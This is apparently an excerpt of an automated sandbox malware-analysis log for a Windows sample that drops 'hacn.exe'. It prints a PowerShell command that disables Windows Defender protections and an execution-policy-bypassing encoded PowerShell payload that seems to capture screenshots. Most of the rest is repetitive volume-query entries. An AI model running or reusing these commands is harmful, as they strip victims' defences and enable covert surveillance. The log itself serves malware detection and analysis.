gacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C8880 cpuid 0_2_00007FF7691C8880
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: GetLocaleInfoW,GetNumberFormatW,4_2_0093D0AB
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeQueries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\libcrypto-1_1.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeQueries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformationJump to behavior
